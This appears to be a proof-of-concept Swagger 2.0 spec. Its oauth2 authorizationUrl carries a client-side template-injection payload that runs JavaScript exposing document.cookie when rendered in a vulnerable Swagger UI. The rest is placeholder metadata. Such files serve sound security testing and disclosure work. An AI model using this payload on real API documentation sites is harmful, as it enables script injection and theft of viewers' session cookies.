swagger: '2.0'
securityDefinitions:
  a:
    type: oauth2
    authorizationUrl: {{constructor.constructor('alert(document.cookie)')()}}
info:
  version: "0.0.1"
  title: Example Title
  description: Please Authorize!
paths:
  /:
    get:
      responses:
        200:
          description: Successful respons
